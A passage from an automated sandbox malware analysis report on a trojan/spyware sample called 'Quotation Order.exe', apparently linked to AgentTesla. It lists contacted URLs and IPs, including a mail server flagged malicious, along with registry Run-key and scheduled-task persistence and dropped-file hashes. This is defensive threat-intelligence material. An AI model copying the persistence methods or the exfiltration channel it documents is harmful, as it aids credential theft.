                                                                                                                                                                                      https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://account.live.com/inlinesignup.aspx?iww=1&id=80600svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd.svchost.exe, 00000024.00000002.2517767699.000002B805778000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1426108352.000002B805776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1426050902.000002B805775000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd(svchost.exe, 00000024.00000002.2517767699.000002B805778000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1426108352.000002B805776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1400049966.000002B805774000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1426050902.000002B805775000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://login.microsoftonline.com/ppsecure/DeviceUpdate.srfsvchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2517369366.000002B805737000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdpServsvchost.exe, 00000024.00000003.1389377028.000002B805735000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1399093323.000002B805735000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1389451722.000002B805735000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=svchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1366155272.00000215E6C59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srfisvchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://account.live.com/inlinesignup.aspx?iww=1&id=80605svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high

                                                                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                                                          Public IPs

                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                          208.95.112.1
                                                                                                                                                                                                          		ip-api.comUnited States
                                                                                                                                                                                                          		53334TUT-ASUSfalse
                                                                                                                                                                                                          192.254.225.166
                                                                                                                                                                                                          		mail.bonnyriggdentalsurgery.com.auUnited States
                                                                                                                                                                                                          		46606UNIFIEDLAYER-AS-1UStrue

                                                                                                                                                                                                          General Information

                                                                                                                                                                                                          Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                                                          Analysis ID:1432027
                                                                                                                                                                                                          Start date and time:2024-04-26 10:06:10 +02:00
                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                          Overall analysis duration:0h 10m 54s
                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                          Number of analysed new started processes analysed:58
                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                          Sample name:Quotation Order.exe
                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                          Classification:mal100.troj.spyw.expl.evad.winEXE@85/46@2/2
                                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                                          • Successful, ratio: 86%
                                                                                                                                                                                                          • Number of executed functions: 289
                                                                                                                                                                                                          • Number of non-executed functions: 2
                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                          • Found application associated with file extension: .exe

                                                                                                                                                                                                          Warnings

                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, SIHClient.exe, Sgrmuserer.exe, WmiPrvSE.exe
                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 40.126.28.21, 40.126.28.14, 40.126.28.13, 40.126.28.22, 40.126.28.18, 40.126.28.19, 40.126.7.32, 40.126.28.11, 199.232.210.172, 20.42.73.29, 20.189.173.21
                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                                                                          Simulations

                                                                                                                                                                                                          Behavior and APIs

                                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                                          10:07:04Task SchedulerRun new task: svchost path: "C:\Users\user\AppData\Roaming\svchost.exe"
                                                                                                                                                                                                          10:07:07AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost "C:\Users\user\AppData\Roaming\svchost.exe"
                                                                                                                                                                                                          10:07:09API Interceptor91x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                          10:07:12API Interceptor50x Sleep call for process: CasPol.exe modified
                                                                                                                                                                                                          10:07:14API Interceptor44x Sleep call for process: AddInProcess32.exe modified
                                                                                                                                                                                                          10:07:17AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run avdfUcC C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe
                                                                                                                                                                                                          10:07:19API Interceptor3x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                          10:07:26AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost "C:\Users\user\AppData\Roaming\svchost.exe"
                                                                                                                                                                                                          10:07:35AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run avdfUcC C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe

                                                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                                                          IPs

                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          208.95.112.1CHEMICAL SPECIFICATIONS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                          TYPE_C_31_M_12 TAMAR 25.4.2024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                          a.cmdGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                          xtnhsVjQTxvH.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                          • ip-api.com/json/
                                                                                                                                                                                                          o3KyzpE7F4.ps1Get hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                          SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                          SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeGet hashmaliciousExela Stealer, Python StealerBrowse
                                                                                                                                                                                                          • ip-api.com/json
                                                                                                                                                                                                          Control-Tributario_KFRCkzlbCHUSEBMRSECA.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • ip-api.com/json
                                                                                                                                                                                                          Swift Payment.batGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                          SARL RABINEAU Order FA2495.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                          192.254.225.166SARL RABINEAU Order FA2495.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                            proforma invoice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                              New order.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                Request_For_A_Quote.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                  Payment_Overdue.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    3ISy5t6Z6d.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                      SecuriteInfo.com.Trojan.DownLoaderNET.447.2279.24952.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                        SecuriteInfo.com.Trojan.DownloaderNET.290.28806.31273.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                          8TyDCm2Gc2.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                            6q1lx5JveN.exeGet hashmaliciousAgentTesla, RedLineBrowse

                                                                                                                                                                                                                              Domains

                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                              mail.bonnyriggdentalsurgery.com.auSARL RABINEAU Order FA2495.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                              • 192.254.225.166
                                                                                                                                                                                                                              proforma invoice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                                              • 192.254.225.166
                                                                                                                                                                                                                              New order.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                              • 192.254.225.166
                                                                                                                                                                                                                              Request_For_A_Quote.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                              • 192.254.225.166
                                                                                                                                                                                                                              Payment_Overdue.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 192.254.225.166
                                                                                                                                                                                                                              3ISy5t6Z6d.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                              • 192.254.225.166
                                                                                                                                                                                                                              SecuriteInfo.com.Trojan.DownLoaderNET.447.2279.24952.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                              • 192.254.225.166
                                                                                                                                                                                                                              SecuriteInfo.com.Trojan.DownloaderNET.290.28806.31273.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                              • 192.254.225.166
                                                                                                                                                                                                                              8TyDCm2Gc2.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                              • 192.254.225.166
                                                                                                                                                                                                                              6q1lx5JveN.exeGet hashmaliciousAgentTesla, RedLineBrowse
                                                                                                                                                                                                                              • 192.254.225.166
                                                                                                                                                                                                                              ip-api.comCHEMICAL SPECIFICATIONS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                              TYPE_C_31_M_12 TAMAR 25.4.2024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                              a.cmdGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                              xtnhsVjQTxvH.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                              o3KyzpE7F4.ps1Get hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                              SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                              SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeGet hashmaliciousExela Stealer, Python StealerBrowse
                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                              Control-Tributario_KFRCkzlbCHUSEBMRSECA.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                              Swift Payment.batGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                              SARL RABINEAU Order FA2495.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                              bg.microsoft.map.fastly.netPayment.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                              • 199.232.214.172
                                                                                                                                                                                                                              https://usigroups-my.sharepoint.com/:o:/p/js/Es3HdUJZlbVJngCJE-Z7JCYBUTZvd1ZCMQwZhhlQoy_hDw?e=mT2aQmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                              • 199.232.210.172
                                                                                                                                                                                                                              https://4yu76uyd4.best/ccon/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 199.232.214.172
                                                                                                                                                                                                                              https://cnmxukx5efilc7lvlel.pages.dev/smart89/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 199.232.210.172
                                                                                                                                                                                                                              https://www.xf2rnb.cn/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 199.232.214.172
                                                                                                                                                                                                                              https://sabbynarula-73p7yyw32q-ue.a.run.app/Win0belzer0sys07/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 199.232.214.172
                                                                                                                                                                                                                              https://heiqi.xyz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 199.232.214.172
                                                                                                                                                                                                                              https://aulixalrrydrea.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                              • 199.232.210.172
                                                                                                                                                                                                                              http://ipscanadvsf.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 199.232.214.172
                                                                                                                                                                                                                              Document_a19_79b555791-28h97348k5477-3219g9.jsGet hashmaliciousLatrodectusBrowse
                                                                                                                                                                                                                              • 199.232.214.172

                                                                                                                                                                                                                              ASNs

                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                              UNIFIEDLAYER-AS-1USDHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                                              • 50.87.253.239
                                                                                                                                                                                                                              CHEMICAL SPECIFICATIONS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                              • 192.254.225.136
                                                                                                                                                                                                                              SOA FOR APR 2024 PDF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                                              • 50.87.195.61
                                                                                                                                                                                                                              INQ No. HDPE-16-GM-00- PI-INQ-3001.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                                              • 162.240.81.18
                                                                                                                                                                                                                              DOC-Zcns1G_.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                              • 192.232.216.145
                                                                                                                                                                                                                              DOC-Zcns1G_.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                              • 192.232.216.145
                                                                                                                                                                                                                              DOC-Zcns1G_.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                              • 192.232.216.145
                                                                                                                                                                                                                              https://www.bing.com/ck/a?!&&p=8c604c2d3901cb1eJmltdHM9MTcxMjc5MzYwMCZpZ3VpZD0wODdjNjgyYy00N2ZlLTYyOGQtMzA1ZC03YmVmNDY5NTYzNjUmaW5zaWQ9NTE2MQ&ptn=3&ver=2&hsh=3&fclid=087c682c-47fe-628d-305d-7bef46956365&u=a1aHR0cHM6Ly9rZWljb3NlY3VyaXR5LmNvbS5teC8&ntb=1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 192.185.214.24
                                                                                                                                                                                                                              https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                              • 162.241.120.242
                                                                                                                                                                                                                              https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                              • 162.241.120.242
                                                                                                                                                                                                                              TUT-ASUSCHEMICAL SPECIFICATIONS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                              TYPE_C_31_M_12 TAMAR 25.4.2024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                              a.cmdGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                              xtnhsVjQTxvH.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                              o3KyzpE7F4.ps1Get hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                              SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                              SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeGet hashmaliciousExela Stealer, Python StealerBrowse
                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                              Control-Tributario_KFRCkzlbCHUSEBMRSECA.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                              Swift Payment.batGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                              SARL RABINEAU Order FA2495.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                              • 208.95.112.1

                                                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exeDHL-7654544CNT Pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                SecuriteInfo.com.PWSX-gen.17424.6091.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                  Draft Document 940465898900011174774000-PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                    DHL DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                      payment.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                        New Order 7003153933.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                          SecuriteInfo.com.Win32.TrojanX-gen.10939.30166.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                            Purchase Order.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                              CHEMICAL SPECIFICATION.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                Quotation.pdf.exeGet hashmaliciousAgentTeslaBrowse

                                                                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_svchost.exe_76a9d338fc2653c368464a4d765b94caa6b9ced8_7a704da5_1f0ca237-1886-4498-bbc5-de8ac235b01d\Report.wer

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                                                  Entropy (8bit):1.2292291332502676
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:fn+Z6Qw0uvduAaKmNTSOZVWdzuiFvZ24lO8E8E:vG1LuvdlalNeECzuiFvY4lO8HE
                                                                                                                                                                                                                                                  MD5:B596EE72B07FD660A3ED773117968118
                                                                                                                                                                                                                                                  SHA1:C77954C40251C40455DC2AA57646E8C69CBF397A
                                                                                                                                                                                                                                                  SHA-256:01DE17DD87995221B95D6CCD423ACA9B7F155B1150789D698B0C3FE3619EBB00
                                                                                                                                                                                                                                                  SHA-512:3EBBCC89B2048866A93C6EB179D79DC785E18AE8BB3E46CD748A683C5AC022FD38F3FE704E397BFA1A7F0038F3F00696CD71E487D7E74AD857A26DAE70D8119C
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.9.2.4.4.0.9.6.1.9.8.9.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.9.2.4.4.2.1.6.5.1.1.5.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.f.0.c.a.2.3.7.-.1.8.8.6.-.4.4.9.8.-.b.b.c.5.-.d.e.8.a.c.2.3.5.b.0.1.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.b.5.4.9.5.7.b.-.6.6.d.8.-.4.5.4.d.-.a.2.c.a.-.0.7.7.6.d.a.8.c.b.1.e.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.A.l.u.d.e.r.o.p.o.l.i.k.o.d.i.q.u.x.e.k.o.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.f.4.-.0.0.0.1.-.0.0.1.3.-.a.e.4.2.-.8.9.c.0.b.0.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.8.6.8.5.1.0.d.1.8.e.1.1.9.e.4.b.3.8.3.7.0.8.2.a.6.d.2.c.e.e.5.0.0.0.0.0.0.0.0.!.0.0.0.0.a.c.f.5.8.b.4.e.b.3.f.0.f.f.d.a.9.a.2.c.d.9.1.d.e.f.5.8.3.4.2.2.a.1.1.e.d.8.7.3.!.s.v.c.h.

                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_svchost.exe_76a9d338fc2653c368464a4d765b94caa6b9ced8_7a704da5_7bb7ece0-a6f4-4113-871b-eeda8472d570\Report.wer

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                                                  Entropy (8bit):1.2291570524277007
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:gXmWZKw0uvduAaqmNTSOZVWdzuiFvZ24lO8E8E:4fKLuvdlaFNeECzuiFvY4lO8HE
                                                                                                                                                                                                                                                  MD5:54DD9DAB108C810C1F2696463317E82F
                                                                                                                                                                                                                                                  SHA1:5E5FB349202833AF011BC20C634462923549B387
                                                                                                                                                                                                                                                  SHA-256:602966970A47F798A27EA027403F6BCE4781E97020402A2CFDC79DEB0697C0F2
                                                                                                                                                                                                                                                  SHA-512:0C34A949CCBA5C67DDB2C8DE8C93595A4B9FA5CA7D36AB0F42246BE9FCA0EE71F6A3AE2985C88B86EDFDFD61BC3718945CAEAEB9B1CACD160E210A14ABC51308
                                                                                                                                                                                                                                                  Malicious:false
